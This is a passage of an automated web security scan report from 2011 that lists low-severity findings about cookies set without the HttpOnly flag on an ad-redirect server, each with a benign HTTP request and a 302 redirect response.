Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:06:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.462. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:55:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:29:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:12:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

14.467. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.468. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:35:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:46:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:21:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
